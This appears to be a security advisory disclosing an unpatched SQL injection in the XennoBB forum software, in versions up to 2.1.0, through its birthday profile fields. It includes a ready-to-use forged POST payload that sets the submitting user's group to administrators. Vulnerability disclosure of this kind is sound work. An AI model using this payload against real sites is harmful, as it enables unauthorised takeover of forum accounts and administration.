XennoBB.txt

`--------------------- SUMMARY ---------------------  
  
Name:  
XennoBB "birthday" SQL Injection (6/8/2006)  
  
Vendor / Product:  
XennoBB Group  
http://www.xennobb.com/  
  
Description:  
The world's most revolutionary and easy to use bulletin board.  
  
Revolutionary because it redefines the boundaries of usability  
and power; from the first version it's a real alternative to  
the commercial forums out there.  
  
How can XennoBB be described in few words?   
Lightning-speed, stable, SECURED(?) and modern.  
  
Version(s) Affected:  
<= 2.1.0  
  
Severity:  
High  
  
Impact:  
SQL Injection (Remote)  
  
Status:  
Unpatched  
  
Discovered by:  
Chris Boulton <http://www.surfionline.com>  
  
------------------- DESCRIPTION -------------------  
  
An exploit exists in the above mentioned versions of XennoBB which  
can be exploited by malicious users to conduct SQL injection attacks.  
  
Input passed to the "bday_day", "bday_month" and "bday_year form  
fields is not properly sanitised before being used in an SQL query.  
This exploit can lead to manipulation of SQL queries by injecting  
arbitary SQL code.  
  
--------------------- EXPLOIT ---------------------  
  
Submit a forged POST request to  
  
/profile.php?section=personal&id={your registered user ID here}  
  
With the following as the POST data:  
  
form_sent=1&form[sex]=a&bday_day=1&bday_month=2&bday_year=", group_id=1, birthday="  
  
Successful exploitation leads to the user group being changed to  
that of Administrators.  
`